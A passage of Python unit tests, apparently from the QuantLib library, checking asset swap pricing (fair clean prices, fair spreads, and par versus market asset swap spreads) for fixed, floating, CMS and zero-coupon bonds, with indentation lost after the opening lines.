        parAssetSwap = AssetSwap(payFixedRate,
                                 bond, bondPrice,
                                 self.iborIndex, self.spread,
                                 Schedule(),
                                 self.iborIndex.dayCounter(),
                                 isPar)
        swapEngine = DiscountingSwapEngine(self.termStructure,
                                           True,
                                           bond.settlementDate(),
                                           Settings.instance().evaluationDate)
        parAssetSwap.setPricingEngine(swapEngine)
        fairCleanPrice = parAssetSwap.fairCleanPrice()
        fairSpread = parAssetSwap.fairSpread()
        tolerance = 1.0e-13

        assetSwap2 = AssetSwap(payFixedRate, bond, fairCleanPrice,
                               self.iborIndex, self.spread,
                               Schedule(),
                               self.iborIndex.dayCounter(),
                               isPar)
        assetSwap2.setPricingEngine(swapEngine)
        self.assertFalse(abs(assetSwap2.NPV()) > tolerance,
                         "\npar asset swap fair clean price doesn't zero the NPV: "
                         + "\n clean price: " + str(bondPrice)
                         + "\n fair clean price: " + str(fairCleanPrice)
                         + "\n NPV: " + str(assetSwap2.NPV())
                         + "\n tolerance: " + str(tolerance))
        self.assertFalse(abs(assetSwap2.fairCleanPrice() - fairCleanPrice) > tolerance,
                         "\npar asset swap fair clean price doesn't equal input "
                         + "clean price at zero NPV: "
                         + "\n input clean price: " + str(fairCleanPrice)
                         + "\n fair clean price: " + str(assetSwap2.fairCleanPrice())
                         + "\n NPV: " + str(assetSwap2.NPV())
                         + "\n tolerance: " + str(tolerance))
        self.assertFalse(abs(assetSwap2.fairSpread() - self.spread) > tolerance,
                         "\npar asset swap fair spread doesn't equal input spread "
                         + "at zero NPV: "
                         + "\n input spread: " + str(self.spread)
                         + "\n fair spread: " + str(assetSwap2.fairSpread())
                         + "\n NPV: " + str(assetSwap2.NPV())
                         + "\n tolerance: " + str(tolerance))
        assetSwap3 = AssetSwap(payFixedRate,
bond, bondPrice,
self.iborIndex, fairSpread,
Schedule(),
self.iborIndex.dayCounter(),
isPar)
assetSwap3.setPricingEngine(swapEngine)
self.assertFalse(abs(assetSwap3.NPV())>tolerance,
"\npar asset swap fair spread doesn't zero the NPV: "
+ "\n spread: " + str(self.spread)
+ "\n fair spread: " + str(fairSpread)
+ "\n NPV: " + str(assetSwap3.NPV())
+ "\n tolerance: " + str(tolerance))
self.assertFalse(abs(assetSwap3.fairCleanPrice() - bondPrice)>tolerance,
"\npar asset swap fair clean price doesn't equal input "
+ "clean price at zero NPV: "
+ "\n input clean price: " + str(bondPrice)
+ "\n fair clean price: " + str(assetSwap3.fairCleanPrice())
+ "\n NPV: " + str(assetSwap3.NPV())
+ "\n tolerance: " + str(tolerance))
self.assertFalse(abs(assetSwap3.fairSpread() - fairSpread)>tolerance,
"\npar asset swap fair spread doesn't equal input spread at"
+ " zero NPV: "
+ "\n input spread: " + str(fairSpread)
+ "\n fair spread: " + str(assetSwap3.fairSpread())
+ "\n NPV: " + str(assetSwap3.NPV())
+ "\n tolerance: " + str(tolerance))
## let's change the npv date
swapEngine = DiscountingSwapEngine(self.termStructure,
True,
bond.settlementDate(),
bond.settlementDate())
parAssetSwap.setPricingEngine(swapEngine)
## fair clean price and fair spread should not change
self.assertFalse(abs(parAssetSwap.fairCleanPrice() - fairCleanPrice)>tolerance,
"\npar asset swap fair clean price changed with NpvDate:"
+ "\n expected clean price: " + str(fairCleanPrice)
+ "\n fair clean price: " + str(parAssetSwap.fairCleanPrice())
+ "\n tolerance: " + str(tolerance))
self.assertFalse(abs(parAssetSwap.fairSpread() - fairSpread)>tolerance,
"\npar asset swap fair spread changed with NpvDate:"
+ "\n expected spread: " + str(fairSpread)
+ "\n fair spread: " + str(parAssetSwap.fairSpread())
+ "\n tolerance: " + str(tolerance))
assetSwap2 = AssetSwap(payFixedRate,
bond, fairCleanPrice,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
isPar)
assetSwap2.setPricingEngine(swapEngine)
self.assertFalse(abs(assetSwap2.NPV())>tolerance,
"\npar asset swap fair clean price doesn't zero the NPV: "
+ "\n clean price: " + str(bondPrice)
+ "\n fair clean price: " + str(fairCleanPrice)
+ "\n NPV: " + str(assetSwap2.NPV())
+ "\n tolerance: " + str(tolerance))
self.assertFalse(abs(assetSwap2.fairCleanPrice() - fairCleanPrice)>tolerance,
"\npar asset swap fair clean price doesn't equal input "
+ "clean price at zero NPV: "
+ "\n input clean price: " + str(fairCleanPrice)
+ "\n fair clean price: " + str(assetSwap2.fairCleanPrice())
+ "\n NPV: " + str(assetSwap2.NPV())
+ "\n tolerance: " + str(tolerance))
self.assertFalse(abs(assetSwap2.fairSpread() - self.spread)>tolerance,
"\npar asset swap fair spread doesn't equal input spread at zero NPV: "
+ "\n input spread: " + str(self.spread)
+ "\n fair spread: " + str(assetSwap2.fairSpread())
+ "\n NPV: " + str(assetSwap2.NPV())
+ "\n tolerance: " + str(tolerance))
assetSwap3 = AssetSwap(payFixedRate,
bond, bondPrice,
self.iborIndex, fairSpread,
Schedule(),
self.iborIndex.dayCounter(),
isPar)
assetSwap3.setPricingEngine(swapEngine)
self.assertFalse(abs(assetSwap3.NPV())>tolerance,
"\npar asset swap fair spread doesn't zero the NPV: "
+ "\n spread: " + str(self.spread)
+ "\n fair spread: " + str(fairSpread)
+ "\n NPV: " + str(assetSwap3.NPV())
+ "\n tolerance: " + str(tolerance))
self.assertFalse(abs(assetSwap3.fairCleanPrice() - bondPrice)>tolerance,
"\npar asset swap fair clean price doesn't equal input "
+ "clean price at zero NPV: "
+ "\n input clean price: " + str(bondPrice)
+ "\n fair clean price: " + str(assetSwap3.fairCleanPrice())
+ "\n NPV: " + str(assetSwap3.NPV())
+ "\n tolerance: " + str(tolerance))
self.assertFalse(abs(assetSwap3.fairSpread() - fairSpread)>tolerance,
"\npar asset swap fair spread doesn't equal input spread at zero NPV: "
+ "\n input spread: " + str(fairSpread)
+ "\n fair spread: " + str(assetSwap3.fairSpread())
+ "\n NPV: " + str(assetSwap3.NPV())
+ "\n tolerance: " + str(tolerance))
## now market asset swap
isPar = False
mktAssetSwap = AssetSwap(payFixedRate,
bond, bondPrice,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
isPar)
swapEngine = DiscountingSwapEngine(self.termStructure,
True,
bond.settlementDate(),
Settings.instance().evaluationDate)
mktAssetSwap.setPricingEngine(swapEngine)
fairCleanPrice = mktAssetSwap.fairCleanPrice()
fairSpread = mktAssetSwap.fairSpread()
assetSwap4 = AssetSwap(payFixedRate,
bond, fairCleanPrice,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
isPar)
assetSwap4.setPricingEngine(swapEngine)
self.assertFalse(abs(assetSwap4.NPV())>tolerance,
"\nmarket asset swap fair clean price doesn't zero the NPV: "
+ "\n clean price: " + str(bondPrice)
+ "\n fair clean price: " + str(fairCleanPrice)
+ "\n NPV: " + str(assetSwap4.NPV())
+ "\n tolerance: " + str(tolerance))
self.assertFalse(abs(assetSwap4.fairCleanPrice() - fairCleanPrice)>tolerance,
"\nmarket asset swap fair clean price doesn't equal input "
+ "clean price at zero NPV: "
+ "\n input clean price: " + str(fairCleanPrice)
+ "\n fair clean price: " + str(assetSwap4.fairCleanPrice())
+ "\n NPV: " + str(assetSwap4.NPV())
+ "\n tolerance: " + str(tolerance))
self.assertFalse(abs(assetSwap4.fairSpread() - self.spread)>tolerance,
"\nmarket asset swap fair spread doesn't equal input spread"
+ " at zero NPV: "
+ "\n input spread: " + str(self.spread)
+ "\n fair spread: " + str(assetSwap4.fairSpread())
+ "\n NPV: " + str(assetSwap4.NPV())
+ "\n tolerance: " + str(tolerance))
assetSwap5 = AssetSwap(payFixedRate,
bond, bondPrice,
self.iborIndex, fairSpread,
Schedule(),
self.iborIndex.dayCounter(),
isPar)
assetSwap5.setPricingEngine(swapEngine)
self.assertFalse(abs(assetSwap5.NPV())>tolerance,
"\nmarket asset swap fair spread doesn't zero the NPV: "
+ "\n spread: " + str(self.spread)
+ "\n fair spread: " + str(fairSpread)
+ "\n NPV: " + str(assetSwap5.NPV())
+ "\n tolerance: " + str(tolerance))
self.assertFalse(abs(assetSwap5.fairCleanPrice() - bondPrice)>tolerance,
"\nmarket asset swap fair clean price doesn't equal input "
+ "clean price at zero NPV: "
+ "\n input clean price: " + str(bondPrice)
+ "\n fair clean price: " + str(assetSwap5.fairCleanPrice())
+ "\n NPV: " + str(assetSwap5.NPV())
+ "\n tolerance: " + str(tolerance))
self.assertFalse(abs(assetSwap5.fairSpread() - fairSpread)>tolerance,
"\nmarket asset swap fair spread doesn't equal input spread at zero NPV: "
+ "\n input spread: " + str(fairSpread)
+ "\n fair spread: " + str(assetSwap5.fairSpread())
+ "\n NPV: " + str(assetSwap5.NPV())
+ "\n tolerance: " + str(tolerance))
## let's change the npv date
swapEngine = DiscountingSwapEngine(self.termStructure,
True,
bond.settlementDate(),
bond.settlementDate())
mktAssetSwap.setPricingEngine(swapEngine)
## fair clean price and fair spread should not change
self.assertFalse(abs(mktAssetSwap.fairCleanPrice() - fairCleanPrice)>tolerance,
"\nmarket asset swap fair clean price changed with NpvDate:"
+ "\n expected clean price: " + str(fairCleanPrice)
+ "\n fair clean price: " + str(mktAssetSwap.fairCleanPrice())
+ "\n tolerance: " + str(tolerance))
self.assertFalse(abs(mktAssetSwap.fairSpread() - fairSpread)>tolerance,
"\nmarket asset swap fair spread changed with NpvDate:"
+ "\n expected spread: " + str(fairSpread)
+ "\n fair spread: " + str(mktAssetSwap.fairSpread())
+ "\n tolerance: " + str(tolerance))
assetSwap4 = AssetSwap(payFixedRate,
bond, fairCleanPrice,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
isPar)
assetSwap4.setPricingEngine(swapEngine)
self.assertFalse(abs(assetSwap4.NPV())>tolerance,
"\nmarket asset swap fair clean price doesn't zero the NPV: "
+ "\n clean price: " + str(bondPrice)
+ "\n fair clean price: " + str(fairCleanPrice)
+ "\n NPV: " + str(assetSwap4.NPV())
+ "\n tolerance: " + str(tolerance))
self.assertFalse(abs(assetSwap4.fairCleanPrice() - fairCleanPrice)>tolerance,
"\nmarket asset swap fair clean price doesn't equal input "
+ "clean price at zero NPV: "
+ "\n input clean price: " + str(fairCleanPrice)
+ "\n fair clean price: " + str(assetSwap4.fairCleanPrice())
+ "\n NPV: " + str(assetSwap4.NPV())
+ "\n tolerance: " + str(tolerance))
self.assertFalse(abs(assetSwap4.fairSpread() - self.spread)>tolerance,
"\nmarket asset swap fair spread doesn't equal input spread at zero NPV: "
+ "\n input spread: " + str(self.spread)
+ "\n fair spread: " + str(assetSwap4.fairSpread())
+ "\n NPV: " + str(assetSwap4.NPV())
+ "\n tolerance: " + str(tolerance))
assetSwap5 = AssetSwap(payFixedRate,
bond, bondPrice,
self.iborIndex, fairSpread,
Schedule(),
self.iborIndex.dayCounter(),
isPar)
assetSwap5.setPricingEngine(swapEngine)
self.assertFalse(abs(assetSwap5.NPV())>tolerance,
"\nmarket asset swap fair spread doesn't zero the NPV: "
+ "\n spread: " + str(self.spread)
+ "\n fair spread: " + str(fairSpread)
+ "\n NPV: " + str(assetSwap5.NPV())
+ "\n tolerance: " + str(tolerance))
self.assertFalse(abs(assetSwap5.fairCleanPrice() - bondPrice)>tolerance,
"\nmarket asset swap fair clean price doesn't equal input "
+ "clean price at zero NPV: "
+ "\n input clean price: " + str(bondPrice)
+ "\n fair clean price: " + str(assetSwap5.fairCleanPrice())
+ "\n NPV: " + str(assetSwap5.NPV())
+ "\n tolerance: " + str(tolerance))
self.assertFalse(abs(assetSwap5.fairSpread() - fairSpread)>tolerance,
"\nmarket asset swap fair spread doesn't equal input spread at zero NPV: "
+ "\n input spread: " + str(fairSpread)
+ "\n fair spread: " + str(assetSwap5.fairSpread())
+ "\n NPV: " + str(assetSwap5.NPV())
+ "\n tolerance: " + str(tolerance))
def testImpliedValue(self):
"""Testing implied bond value against asset-swap fair price with null spread..."""
bondCalendar = TARGET()
settlementDays = 3
fixingDays = 2
payFixedRate = True
parAssetSwap = True
inArrears = False
## Fixed Underlying bond (Isin: DE0001135275 DBR 4 01/04/37)
## maturity doesn't occur on a business day
fixedBondSchedule1 = Schedule(Date(4,January,2005),
Date(4,January,2037),
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
fixedBond1 = FixedRateBond(settlementDays, self.faceAmount,
fixedBondSchedule1,
[0.04],
ActualActual(ActualActual.ISDA),
Following,
100.0, Date(4,January,2005))
bondEngine = DiscountingBondEngine(self.termStructure)
swapEngine = DiscountingSwapEngine(self.termStructure, False)
fixedBond1.setPricingEngine(bondEngine)
fixedBondPrice1 = fixedBond1.cleanPrice()
fixedBondAssetSwap1 = AssetSwap(payFixedRate,
fixedBond1, fixedBondPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
fixedBondAssetSwap1.setPricingEngine(swapEngine)
fixedBondAssetSwapPrice1 = fixedBondAssetSwap1.fairCleanPrice()
tolerance = 1.0e-13
error1 = abs(fixedBondAssetSwapPrice1-fixedBondPrice1)
self.assertFalse(error1>tolerance,
"wrong zero spread asset swap price for fixed bond:"
+ "\n bond's clean price: " + str(fixedBondPrice1)
+ "\n asset swap fair price: " + str(fixedBondAssetSwapPrice1)
+ "\n error: " + str(error1)
+ "\n tolerance: " + str(tolerance))
## Fixed Underlying bond (Isin: IT0006527060 IBRD 5 02/05/19)
## maturity occurs on a business day
fixedBondSchedule2 = Schedule(Date(5,February,2005),
Date(5,February,2019),
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
fixedBond2 = FixedRateBond(settlementDays, self.faceAmount,
fixedBondSchedule2,
[0.05],
Thirty360(Thirty360.BondBasis),
Following,
100.0, Date(5,February,2005))
fixedBond2.setPricingEngine(bondEngine)
fixedBondPrice2 = fixedBond2.cleanPrice()
fixedBondAssetSwap2 = AssetSwap(payFixedRate,
fixedBond2, fixedBondPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
fixedBondAssetSwap2.setPricingEngine(swapEngine)
fixedBondAssetSwapPrice2 = fixedBondAssetSwap2.fairCleanPrice()
error2 = abs(fixedBondAssetSwapPrice2-fixedBondPrice2)
self.assertFalse(error2>tolerance,
"wrong zero spread asset swap price for fixed bond:"
+ "\n bond's clean price: " + str(fixedBondPrice2)
+ "\n asset swap fair price: " + str(fixedBondAssetSwapPrice2)
+ "\n error: " + str(error2)
+ "\n tolerance: " + str(tolerance))
## FRN Underlying bond (Isin: IT0003543847 ISPIM 0 09/29/13)
## maturity doesn't occur on a business day
floatingBondSchedule1 = Schedule(Date(29,September,2003),
Date(29,September,2013),
Period(Semiannual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
floatingBond1 = FloatingRateBond(settlementDays, self.faceAmount,
floatingBondSchedule1,
self.iborIndex, Actual360(),
Following, fixingDays,
[1],
[0.0056],
[],
[],
inArrears,
100.0, Date(29,September,2003))
floatingBond1.setPricingEngine(bondEngine)
setCouponPricer(floatingBond1.cashflows(), self.pricer)
self.iborIndex.addFixing(Date(27,March,2007), 0.0402)
floatingBondPrice1 = floatingBond1.cleanPrice()
floatingBondAssetSwap1 = AssetSwap(payFixedRate,
floatingBond1, floatingBondPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
floatingBondAssetSwap1.setPricingEngine(swapEngine)
floatingBondAssetSwapPrice1 = floatingBondAssetSwap1.fairCleanPrice()
error3 = abs(floatingBondAssetSwapPrice1-floatingBondPrice1)
self.assertFalse(error3>tolerance,
"wrong zero spread asset swap price for floater:"
+ "\n bond's clean price: " + str(floatingBondPrice1)
+ "\n asset swap fair price: " + str(floatingBondAssetSwapPrice1)
+ "\n error: " + str(error3)
+ "\n tolerance: " + str(tolerance))
## FRN Underlying bond (Isin: XS0090566539 COE 0 09/24/18)
## maturity occurs on a business day
floatingBondSchedule2 = Schedule(Date(24,September,2004),
Date(24,September,2018),
Period(Semiannual), bondCalendar,
ModifiedFollowing, ModifiedFollowing,
DateGeneration.Backward, False)
floatingBond2 = FloatingRateBond(settlementDays, self.faceAmount,
floatingBondSchedule2,
self.iborIndex, Actual360(),
ModifiedFollowing, fixingDays,
[1],
[0.0025],
[],
[],
inArrears,
100.0, Date(24,September,2004))
floatingBond2.setPricingEngine(bondEngine)
setCouponPricer(floatingBond2.cashflows(), self.pricer)
self.iborIndex.addFixing(Date(22,March,2007), 0.04013)
currentCoupon = 0.04013+0.0025
floatingCurrentCoupon = floatingBond2.nextCouponRate()
error4 = abs(floatingCurrentCoupon-currentCoupon)
self.assertFalse(error4>tolerance,
"wrong current coupon returned for floating bond:"
+ "\n expected current coupon: " + str(currentCoupon)
+ "\n bond's current coupon: " + str(floatingCurrentCoupon)
+ "\n error: " + str(error4)
+ "\n tolerance: " + str(tolerance))
floatingBondPrice2 = floatingBond2.cleanPrice()
floatingBondAssetSwap2 = AssetSwap(payFixedRate,
floatingBond2, floatingBondPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
floatingBondAssetSwap2.setPricingEngine(swapEngine)
floatingBondAssetSwapPrice2 = floatingBondAssetSwap2.fairCleanPrice()
error5 = abs(floatingBondAssetSwapPrice2-floatingBondPrice2)
self.assertFalse(error5>tolerance,
"wrong zero spread asset swap price for floater:"
+ "\n bond's clean price: " + str(floatingBondPrice2)
+ "\n asset swap fair price: " + str(floatingBondAssetSwapPrice2)
+ "\n error: " + str(error5)
+ "\n tolerance: " + str(tolerance))
## CMS Underlying bond (Isin: XS0228052402 CRDIT 0 8/22/20)
## maturity doesn't occur on a business day
cmsBondSchedule1 = Schedule(Date(22,August,2005),
Date(22,August,2020),
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
cmsBond1 = CmsRateBond(settlementDays, self.faceAmount,
cmsBondSchedule1,
self.swapIndex, Thirty360(Thirty360.BondBasis),
Following, fixingDays,
[1.0],
[0.0],
[0.055],
[0.025],
inArrears,
100.0, Date(22,August,2005))
cmsBond1.setPricingEngine(bondEngine)
setCouponPricer(cmsBond1.cashflows(), self.cmspricer)
self.swapIndex.addFixing(Date(18,August,2006), 0.04158)
cmsBondPrice1 = cmsBond1.cleanPrice()
cmsBondAssetSwap1 = AssetSwap(payFixedRate,
cmsBond1, cmsBondPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
cmsBondAssetSwap1.setPricingEngine(swapEngine)
cmsBondAssetSwapPrice1 = cmsBondAssetSwap1.fairCleanPrice()
error6 = abs(cmsBondAssetSwapPrice1-cmsBondPrice1)
self.assertFalse(error6>tolerance,
"wrong zero spread asset swap price for cms bond:"
+ "\n bond's clean price: " + str(cmsBondPrice1)
+ "\n asset swap fair price: " + str(cmsBondAssetSwapPrice1)
+ "\n error: " + str(error6)
+ "\n tolerance: " + str(tolerance))
## CMS Underlying bond (Isin: XS0218766664 ISPIM 0 5/6/15)
## maturity occurs on a business day
cmsBondSchedule2 = Schedule(Date(6,May,2005),
Date(6,May,2015),
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
cmsBond2 = CmsRateBond(settlementDays, self.faceAmount, cmsBondSchedule2,
self.swapIndex, Thirty360(Thirty360.BondBasis),
Following, fixingDays,
[0.84], [0.0],
[], [],
inArrears,
100.0, Date(6,May,2005))
cmsBond2.setPricingEngine(bondEngine)
setCouponPricer(cmsBond2.cashflows(), self.cmspricer)
self.swapIndex.addFixing(Date(4,May,2006), 0.04217)
cmsBondPrice2 = cmsBond2.cleanPrice()
cmsBondAssetSwap2 = AssetSwap(payFixedRate,
cmsBond2, cmsBondPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
cmsBondAssetSwap2.setPricingEngine(swapEngine)
cmsBondAssetSwapPrice2 = cmsBondAssetSwap2.fairCleanPrice()
error7 = abs(cmsBondAssetSwapPrice2-cmsBondPrice2)
self.assertFalse(error7>tolerance,
"wrong zero spread asset swap price for cms bond:"
+ "\n bond's clean price: " + str(cmsBondPrice2)
+ "\n asset swap fair price: " + str(cmsBondAssetSwapPrice2)
+ "\n error: " + str(error7)
+ "\n tolerance: " + str(tolerance))
## Zero Coupon bond (Isin: DE0004771662 IBRD 0 12/20/15)
## maturity doesn't occur on a business day
zeroCpnBond1 = ZeroCouponBond(settlementDays, bondCalendar, self.faceAmount,
Date(20,December,2015),
Following,
100.0, Date(19,December,1985))
zeroCpnBond1.setPricingEngine(bondEngine)
zeroCpnBondPrice1 = zeroCpnBond1.cleanPrice()
zeroCpnAssetSwap1 = AssetSwap(payFixedRate,
zeroCpnBond1, zeroCpnBondPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
zeroCpnAssetSwap1.setPricingEngine(swapEngine)
zeroCpnBondAssetSwapPrice1 = zeroCpnAssetSwap1.fairCleanPrice()
error8 = abs(zeroCpnBondAssetSwapPrice1-zeroCpnBondPrice1)
self.assertFalse(error8>tolerance,
"wrong zero spread asset swap price for zero cpn bond:"
+ "\n bond's clean price: " + str(zeroCpnBondPrice1)
+ "\n asset swap fair price: " + str(zeroCpnBondAssetSwapPrice1)
+ "\n error: " + str(error8)
+ "\n tolerance: " + str(tolerance))
## Zero Coupon bond (Isin: IT0001200390 ISPIM 0 02/17/28)
## maturity occurs on a business day
zeroCpnBond2 = ZeroCouponBond(settlementDays, bondCalendar, self.faceAmount,
Date(17,February,2028),
Following,
100.0, Date(17,February,1998))
zeroCpnBond2.setPricingEngine(bondEngine)
zeroCpnBondPrice2 = zeroCpnBond2.cleanPrice()
zeroCpnAssetSwap2 = AssetSwap(payFixedRate,
zeroCpnBond2, zeroCpnBondPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
zeroCpnAssetSwap2.setPricingEngine(swapEngine)
zeroCpnBondAssetSwapPrice2 = zeroCpnAssetSwap2.fairCleanPrice()
error9 = abs(zeroCpnBondAssetSwapPrice2-zeroCpnBondPrice2)
self.assertFalse(error9>tolerance,
"wrong zero spread asset swap price for zero cpn bond:"
+ "\n bond's clean price: " + str(zeroCpnBondPrice2)
+ "\n asset swap fair price: " + str(zeroCpnBondAssetSwapPrice2)
+ "\n error: " + str(error9)
+ "\n tolerance: " + str(tolerance))
def testMarketASWSpread(self) :
"""Testing relationship between market asset swap and par asset swap..."""
bondCalendar = TARGET()
settlementDays = 3
fixingDays = 2
payFixedRate = True
parAssetSwap = True
mktAssetSwap = False
inArrears = False
## Fixed Underlying bond (Isin: DE0001135275 DBR 4 01/04/37)
## maturity doesn't occur on a business day
fixedBondSchedule1 = Schedule(Date(4,January,2005),
Date(4,January,2037),
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
fixedBond1 = FixedRateBond(settlementDays, self.faceAmount, fixedBondSchedule1,
[0.04],
ActualActual(ActualActual.ISDA), Following,
100.0, Date(4,January,2005))
bondEngine = DiscountingBondEngine(self.termStructure)
swapEngine = DiscountingSwapEngine(self.termStructure,False)
fixedBond1.setPricingEngine(bondEngine)
fixedBondMktPrice1 = 89.22 ## market price observed on 7th June 2007
fixedBondMktFullPrice1=fixedBondMktPrice1+fixedBond1.accruedAmount()
fixedBondParAssetSwap1 = AssetSwap(payFixedRate,
fixedBond1, fixedBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
fixedBondParAssetSwap1.setPricingEngine(swapEngine)
fixedBondParAssetSwapSpread1 = fixedBondParAssetSwap1.fairSpread()
fixedBondMktAssetSwap1 = AssetSwap(payFixedRate,
fixedBond1, fixedBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
mktAssetSwap)
fixedBondMktAssetSwap1.setPricingEngine(swapEngine)
fixedBondMktAssetSwapSpread1 = fixedBondMktAssetSwap1.fairSpread()
tolerance = 1.0e-13
error1 = abs(fixedBondMktAssetSwapSpread1-
100*fixedBondParAssetSwapSpread1/fixedBondMktFullPrice1)
self.assertFalse(error1>tolerance,
"wrong asset swap spreads for fixed bond:"
+ "\n market ASW spread: " + str(fixedBondMktAssetSwapSpread1)
+ "\n par ASW spread: " + str(fixedBondParAssetSwapSpread1)
+ "\n error: " + str(error1)
+ "\n tolerance: " + str(tolerance))
## Fixed Underlying bond (Isin: IT0006527060 IBRD 5 02/05/19)
## maturity occurs on a business day
fixedBondSchedule2 = Schedule(Date(5,February,2005),
Date(5,February,2019),
Period(Annual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
fixedBond2 = FixedRateBond(settlementDays, self.faceAmount, fixedBondSchedule2,
[0.05],
Thirty360(Thirty360.BondBasis), Following,
100.0, Date(5,February,2005))
fixedBond2.setPricingEngine(bondEngine)
fixedBondMktPrice2 = 99.98 ## market price observed on 7th June 2007
fixedBondMktFullPrice2 = fixedBondMktPrice2+fixedBond2.accruedAmount()
fixedBondParAssetSwap2 = AssetSwap(payFixedRate,
fixedBond2, fixedBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
fixedBondParAssetSwap2.setPricingEngine(swapEngine)
fixedBondParAssetSwapSpread2 = fixedBondParAssetSwap2.fairSpread()
fixedBondMktAssetSwap2 = AssetSwap(payFixedRate,
fixedBond2, fixedBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
mktAssetSwap)
fixedBondMktAssetSwap2.setPricingEngine(swapEngine)
fixedBondMktAssetSwapSpread2 = fixedBondMktAssetSwap2.fairSpread()
error2 = abs(fixedBondMktAssetSwapSpread2-
100*fixedBondParAssetSwapSpread2/fixedBondMktFullPrice2)
self.assertFalse(error2>tolerance,
"wrong asset swap spreads for fixed bond:"
+ "\n market ASW spread: " + str(fixedBondMktAssetSwapSpread2)
+ "\n par ASW spread: " + str(fixedBondParAssetSwapSpread2)
+ "\n error: " + str(error2)
+ "\n tolerance: " + str(tolerance))
## FRN Underlying bond (Isin: IT0003543847 ISPIM 0 09/29/13)
## maturity doesn't occur on a business day
floatingBondSchedule1 = Schedule(Date(29,September,2003),
Date(29,September,2013),
Period(Semiannual), bondCalendar,
Unadjusted, Unadjusted,
DateGeneration.Backward, False)
floatingBond1 = FloatingRateBond(settlementDays, self.faceAmount,
floatingBondSchedule1,
self.iborIndex, Actual360(),
Following, fixingDays,
[1], [0.0056],
[],[],
inArrears,
100.0, Date(29,September,2003))
floatingBond1.setPricingEngine(bondEngine)
setCouponPricer(floatingBond1.cashflows(), self.pricer)
self.iborIndex.addFixing(Date(27,March,2007), 0.0402)
## market price observed on 7th June 2007
floatingBondMktPrice1 = 101.64
floatingBondMktFullPrice1 = floatingBondMktPrice1+floatingBond1.accruedAmount()
floatingBondParAssetSwap1 = AssetSwap(payFixedRate,
floatingBond1, floatingBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
floatingBondParAssetSwap1.setPricingEngine(swapEngine)
floatingBondParAssetSwapSpread1 = floatingBondParAssetSwap1.fairSpread()
floatingBondMktAssetSwap1 = AssetSwap(payFixedRate,
floatingBond1, floatingBondMktPrice1,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
mktAssetSwap)
floatingBondMktAssetSwap1.setPricingEngine(swapEngine)
floatingBondMktAssetSwapSpread1 = floatingBondMktAssetSwap1.fairSpread()
error3 = abs(floatingBondMktAssetSwapSpread1-
100*floatingBondParAssetSwapSpread1/floatingBondMktFullPrice1)
self.assertFalse(error3>tolerance,
"wrong asset swap spreads for floating bond:"
+ "\n market ASW spread: " + str(floatingBondMktAssetSwapSpread1)
+ "\n par ASW spread: " + str(floatingBondParAssetSwapSpread1)
+ "\n error: " + str(error3)
+ "\n tolerance: " + str(tolerance))
## FRN Underlying bond (Isin: XS0090566539 COE 0 09/24/18)
## maturity occurs on a business day
floatingBondSchedule2 = Schedule(Date(24,September,2004),
Date(24,September,2018),
Period(Semiannual), bondCalendar,
ModifiedFollowing, ModifiedFollowing,
DateGeneration.Backward, False)
floatingBond2 = FloatingRateBond(settlementDays, self.faceAmount,
floatingBondSchedule2,
self.iborIndex, Actual360(),
ModifiedFollowing, fixingDays,
[1], [0.0025],
[], [],
inArrears,
100.0, Date(24,September,2004))
floatingBond2.setPricingEngine(bondEngine)
setCouponPricer(floatingBond2.cashflows(), self.pricer)
self.iborIndex.addFixing(Date(22,March,2007), 0.04013)
## market price observed on 7th June 2007
floatingBondMktPrice2 = 101.248
floatingBondMktFullPrice2 = floatingBondMktPrice2+floatingBond2.accruedAmount()
floatingBondParAssetSwap2 = AssetSwap(payFixedRate,
floatingBond2, floatingBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
parAssetSwap)
floatingBondParAssetSwap2.setPricingEngine(swapEngine)
floatingBondParAssetSwapSpread2 = floatingBondParAssetSwap2.fairSpread()
floatingBondMktAssetSwap2 = AssetSwap(payFixedRate,
floatingBond2, floatingBondMktPrice2,
self.iborIndex, self.spread,
Schedule(),
self.iborIndex.dayCounter(),
mktAssetSwap)
floatingBondMktAssetSwap2.setPricingEngine(swapEngine)
floatingBondMktAssetSwapSpread2 = floatingBondMktAssetSwap2.fairSpread()
error4 = abs(floatingBondMktAssetSwapSpread2-
100*floatingBondParAssetSwapSpread2/floatingBondMktFullPrice2)
self.assertFalse(error4>tolerance ,
"wrong asset swap spreads for floating bond:"
+ "\n market ASW spread: " + str(floatingBondMktAssetSwapSpread2)
